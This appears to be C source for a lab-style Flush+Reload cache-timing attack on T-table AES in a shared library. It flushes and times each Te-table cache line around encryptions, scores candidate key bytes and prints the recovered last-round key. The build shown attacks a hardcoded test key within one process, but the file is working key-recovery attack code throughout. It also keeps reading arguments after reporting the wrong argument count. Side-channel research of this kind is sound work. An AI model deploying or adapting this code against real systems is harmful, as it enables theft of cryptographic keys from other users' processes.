#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stdlib.h>

#include "cache_low.h"
#include "cache_util.h"

// Possible macros:
// - WITH_PROCESS_SINGLE
// - WITH_CACHE_FLUSH

// Only certain combinations of these macros are supported
#if !defined(WITH_PROCESS_SINGLE) || !defined(WITH_CACHE_FLUSH)
#error Please check the macro used. For now, only single process + flush is a valid combination.
#endif


#ifdef WITH_PROCESS_SINGLE
#include "aes.h"
#endif //ifdef WITH_PROCESS_SINGLE

// Capacity of the plaintext array in struct attack_ctx
#define MAX_PLAINTEXTS 3000
// Capacity of a shell command string buffer
#define MAX_CMD_SIZE 100
// Number of entries in one T-table (also the number of score slots per key byte)
#define T_TABLE_ENTRIES 256

// Sizes below are in bytes.
// Block size shared by ciphertext and plaintext
#define AES_BLOCK_SIZE 16
#define AES128_KEY_SIZE 16
#define CACHE_LINE_SIZE 64

// Number of possible values of one key byte
#define KEY_BYTE_CANDIDATE 256

// T-table elements are 32 bits (4 bytes) wide, so one 64-byte cache line
// holds 16 of them and a 256-entry table spans 16 cache lines.
#define ELEMENT_PER_CACHE_LINE 16
#define CACHE_LINE_IN_T_TABLE 16

// State shared by all phases of the attack.
struct attack_ctx {
  // Number of plaintexts to process
  uint16_t plaintext_cnt;
  // Access-time threshold compared against the result of memaccesstime_u16()
  uint16_t threshold;
  // Mapped addresses of the tables Te0..Te3 inside the AES library
  uint32_t *addr_te[4];
  // Plaintexts stored as raw bytes (decoded from their hexadecimal text form)
  uint8_t plaintexts[MAX_PLAINTEXTS][AES_BLOCK_SIZE];
  // score[i][k]: accumulated score of candidate value k for key byte i
  uint16_t score[AES128_KEY_SIZE][T_TABLE_ENTRIES];
  // Predicted last-round key, one byte per position
  uint8_t predict_key[AES128_KEY_SIZE];
};


/*
 * Print `size` bytes of `buffer` to stdout as lowercase two-digit hexadecimal
 * values with no separators, followed by a newline.
 *
 * buffer: bytes to print; only read, never modified.
 * size:   number of bytes to print; 0 prints just the newline.
 */
void printhex_uint8(const uint8_t *buffer, size_t size) {
  // The index has the same type as `size`, so the comparison never mixes signedness.
  for (size_t i = 0; i < size; i++) {
    printf("%02x", buffer[i]);
  }
  printf("\n");
}

int prepare_ctx(int argc, char **argv, struct attack_ctx *ctx) {

  // Read arguments
  if (argc != 7) {
    printf("Wrong numbers of arguments.\n");
    printf("Usage %s <offset_te0> <offset_te1> <offset_te2> <offset_te3> <plaintext_cnt> <threshold>\n", argv[0]);
  }

  uint32_t offset_te0 = strtoul(argv[1], NULL, 16);
  uint32_t offset_te1 = strtoul(argv[2], NULL, 16);
  uint32_t offset_te2 = strtoul(argv[3], NULL, 16);
  uint32_t offset_te3 = strtoul(argv[4], NULL, 16);

  ctx->plaintext_cnt = strtoul(argv[5], NULL, 0);
  ctx->threshold = strtoul(argv[6], NULL, 0);
  printf("DEBUG: ctx->plaintext_cnt %u\n", ctx->plaintext_cnt);
  printf("DEBUG: ctx->threshold %u\n", ctx->threshold);

  // Map library
  const char* lib_filename = "libaes.so";
  ctx->addr_te[0] = (uint32_t *) map_offset(lib_filename, offset_te0);
  ctx->addr_te[1] = (uint32_t *) map_offset(lib_filename, offset_te1);
  ctx->addr_te[2] = (uint32_t *) map_offset(lib_filename, offset_te2);
  ctx->addr_te[3] = (uint32_t *) map_offset(lib_filename, offset_te3);

  printf("DEBUG: ctx->addr_te %p %p %p %p\n", ctx->addr_te[0], ctx->addr_te[1], ctx->addr_te[2], ctx->addr_te[3]);

  // Read plaintext file
  FILE *fp = fopen("plaintext.txt", "r");
  if (fp == NULL) {
    printf("Could not open file plaintext.txt\n");
    return -1;
  }

  int plaintext_cnt;

  fscanf(fp, "%d\n", &plaintext_cnt);
  if (plaintext_cnt > ctx->plaintext_cnt) {
    plaintext_cnt = ctx->plaintext_cnt;
  }
  if (plaintext_cnt < ctx->plaintext_cnt) {
    ctx->plaintext_cnt = plaintext_cnt;
  }
  printf("Total plaintext: %d\n", plaintext_cnt);

  uint8_t plaintext[AES_BLOCK_SIZE*2+1] = {0,};
  for(int i=0; i<plaintext_cnt; i++) {
    fscanf(fp, "%s\n", plaintext);

    if(strlen(plaintext) != 32) {
      printf("Plaintext size not equals to 32.\n");
      return -1;
    }

    for (int j = 0; j < AES_BLOCK_SIZE; j++) {
      sscanf(&plaintext[j*2], "%2hhx", &ctx->plaintexts[i][j]);
    }
  }
  fclose(fp);

  return 0;
}

/*
 * Release the four T-table mappings held in ctx->addr_te.
 *
 * Always returns 0.
 */
int finalize_ctx(struct attack_ctx *ctx) {
  for (int te = 0; te < 4; te++) {
    unmap_offset(ctx->addr_te[te]);
  }

  // The function is declared int, so it must return a value on every path.
  return 0;
}

/*
 * Tell whether the measurements of table Te<te> are relevant for key byte
 * `aes_key_byte_i`.
 *
 * Table / key byte pairing:
 *
 *   Te2 -> bytes 0, 4,  8, 12
 *   Te3 -> bytes 1, 5,  9, 13
 *   Te0 -> bytes 2, 6, 10, 14
 *   Te1 -> bytes 3, 7, 11, 15
 *
 * Returns 1 for a matching pair, 0 otherwise.
 */
static inline int is_useful_record(int te, int aes_key_byte_i)
{
  const int table_column = (te + 2) % 4;
  const int byte_column = aes_key_byte_i % 4;

  if (table_column != byte_column) {
    return 0;
  }
  return 1;
}

/*
 * Time the T-table cache lines for every plaintext and accumulate the
 * candidate scores in ctx->score.
 *
 * For each plaintext and each of the 4 x CACHE_LINE_IN_T_TABLE cache lines:
 * the line is flushed, the plaintext is encrypted, and the line is timed with
 * memaccesstime_u16(). A line is flagged when its access time is at or above
 * ctx->threshold (presumably meaning the encryption did not touch it).
 *
 * For every key byte i, the flagged lines of the matching table (see
 * is_useful_record()) are walked: each table element in such a line
 * contributes one point to the candidate `ciphertext[i] ^ element_byte`.
 * Candidates that keep a low score are the ones find_last_round_key_by_score()
 * later selects.
 *
 * Returns 0 on success and -1 if the AES key schedule cannot be initialized.
 */
static int calc_score(struct attack_ctx *ctx)
{
  int plaintext_cnt = ctx->plaintext_cnt;
  int threshold = ctx->threshold;

#ifdef WITH_PROCESS_SINGLE
  uint8_t aes_user_key[16]        = {0x2b, 0x7e, 0x15, 0x16, 0x28, 0xae, 0xd2, 0xa6, 0xab, 0xf7, 0x15, 0x88, 0x09, 0xcf, 0x4f, 0x3c};
  AES_KEY aes_key;
  // Initialize AES function
  printf("AES_set_encrypt_key\n");
  if (AES_set_encrypt_key(aes_user_key, 128, &aes_key) < 0) {
    printf("AES_set_encrypt_key error.\n");
    // Must be negative: the caller only treats values < 0 as failure.
    return -1;
  }

  printf("AES round 10 key: %08x %08x %08x %08x\n", aes_key.rd_key[40], aes_key.rd_key[41], aes_key.rd_key[42], aes_key.rd_key[43]); // DEBUG
#endif //ifdef WITH_PROCESS_SINGLE

  // Initialize score array
  memset(ctx->score, 0, sizeof(ctx->score));

  uint8_t ciphertext[AES_BLOCK_SIZE] = {0};
  /* Per-table, per-cache-line flag: 1 when the timed access was >= threshold */
  uint16_t access_table_s[4][CACHE_LINE_IN_T_TABLE];

  // For each plaintext
  for(int p = 0; p < plaintext_cnt; p++) {
    // Initialize access array
    memset(access_table_s, 0, sizeof(access_table_s));
    printf("plaintext:");
    printhex_uint8(ctx->plaintexts[p], AES_BLOCK_SIZE);

    // Work through all T Tables and all possible cache lines.
    // The flush / encrypt / time order inside the inner loop is the
    // measurement itself and must not be rearranged.
    for(int te = 0; te <= 3; te++) {
      for(int s = 0; s < CACHE_LINE_IN_T_TABLE; s ++) {
        // Start address of cache line s of this table (pointer arithmetic on
        // uint32_t*, so the step is ELEMENT_PER_CACHE_LINE elements)
        void *line_addr = ctx->addr_te[te] + s*ELEMENT_PER_CACHE_LINE;

#ifdef WITH_CACHE_FLUSH
        clflush(line_addr);
#endif //ifdef WITH_CACHE_FLUSH

        // Encryption
#ifdef WITH_PROCESS_SINGLE
        AES_encrypt(ctx->plaintexts[p], ciphertext, &aes_key);
#endif //ifdef WITH_PROCESS_SINGLE

        // Analyze cache state
        uint16_t count = memaccesstime_u16(line_addr);
        access_table_s[te][s] = count < threshold? 0 : 1;
      } // end for s
    } // end for te

    printf("ciphertext:");
    printhex_uint8(ciphertext, AES_BLOCK_SIZE);

    // For each key byte, walk the flagged lines of the matching table
    for(int i = 0; i < AES128_KEY_SIZE; i++) { // For all Ki
      for(int te = 0; te <= 3; te++) { // For each Te Table
        if (is_useful_record(te, i) != 1) {
          continue;
        }

        for(int s = 0; s < CACHE_LINE_IN_T_TABLE; s++) {
          if(access_table_s[te][s] == 0) {
            continue;
          }

          const uint32_t *val_word_ptr = ctx->addr_te[te] + s*ELEMENT_PER_CACHE_LINE;

          // Add the line's flag to the candidate derived from every element in it
          for (int offset = 0; offset < ELEMENT_PER_CACHE_LINE; offset++) {
            // Byte 3 - i%4 of the element as laid out in memory.
            // NOTE(review): this picks the intended byte only on a
            // little-endian host — confirm if the code is ever ported.
            uint8_t val = ((const uint8_t*)val_word_ptr)[3 - i%4];
            // candidate = ciphertext byte XOR table byte
            ctx->score[i][ciphertext[i] ^ val] += access_table_s[te][s];
            val_word_ptr ++; // next u32 element
          }
        }
      }
    }

    /* Print progress */
    if(p % 20 == 0)
      printf("progress : %d / %d\n", p, plaintext_cnt);
  }

  return 0;
}

/*
 * Predict the last round key from the final scores.
 *
 * For every key byte position the candidate with the lowest score in
 * ctx->score is stored in ctx->predict_key; on a tie the smallest candidate
 * value wins. All scores and the chosen candidates are printed as debug
 * output, followed by the predicted key in hexadecimal.
 */
static void find_last_round_key_by_score(struct attack_ctx *ctx)
{
  printf("DEBUG: score array:\n");

  // for each byte in the key
  for(int ki = 0; ki < AES128_KEY_SIZE; ki++) {
    // Start from candidate 0 so no sentinel value is needed
    unsigned int best = 0;
    unsigned int min = ctx->score[ki][0];

    // for score of each candidate byte for the given byte
    for(unsigned int kbyte = 0; kbyte < KEY_BYTE_CANDIDATE; kbyte++) {
      unsigned int candidate_score = ctx->score[ki][kbyte];

      // Unsigned conversions match the unsigned arguments
      printf("%02x:%6u ", kbyte, candidate_score); // DEBUG
      if(candidate_score < min) {
        min = candidate_score;
        best = kbyte;
      }
    }

    ctx->predict_key[ki] = (uint8_t) best;
    printf("best %u at 0x%02x\n", min, best); // DEBUG
  }

  printf("predict last round key : ");
  printhex_uint8(ctx->predict_key, sizeof(ctx->predict_key));
}

// Entry point. The attacker passes the offsets of Te0, Te1, Te2, Te3 plus the
// plaintext count and the timing threshold (see prepare_ctx for the details).
// Returns 0 on success and 1 when preparation or the measurement fails.
int main(int argc, char **argv) {

  struct attack_ctx ctx;
  int status = 0;

  // Check and read args
  if (prepare_ctx(argc, argv, &ctx) < 0) {
    return 1;
  }

  // Attack
  if (calc_score(&ctx) < 0) {
    status = 1;
  } else {
    find_last_round_key_by_score(&ctx);
  }

  // Clean resources: unmap library. This also runs when the attack failed,
  // so the mappings are released on every path after a successful prepare.
  finalize_ctx(&ctx);

  return status;
}